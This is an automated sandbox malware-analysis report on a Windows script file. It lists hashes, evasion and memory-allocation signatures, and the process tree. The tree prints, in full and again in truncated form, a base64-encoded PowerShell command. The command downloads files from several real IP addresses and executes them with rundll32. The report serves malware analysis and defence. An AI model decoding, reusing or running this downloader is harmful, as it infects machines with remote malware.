Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 12, 2023, 1:36 p.m.	April 12, 2023, 1:38 p.m.

Size	198.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`964c85c835fe3ee30b9cc70d484fad43`
SHA256	`47a724dbf9f9de0bd397164241242e35e203d00ff99d511146403b3866bae733`
CRC32	`890F50E3`
ssdeep	`6144:ONmBQcyVnMOshwsacGIsKv/IdlIsOtYp4:O4BQcthJJITlO`
Yara	Generic_Malware_Zero - Generic Malware

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xI-Febuary.12(69).wsf
2060
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="
  2184

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2023, 1:36 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 12, 2023, 1:36 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004054d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00405b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2023, 1:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00406098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 12, 2023, 1:36 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 133 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02583000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02584000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02589000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2023, 1:36 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAb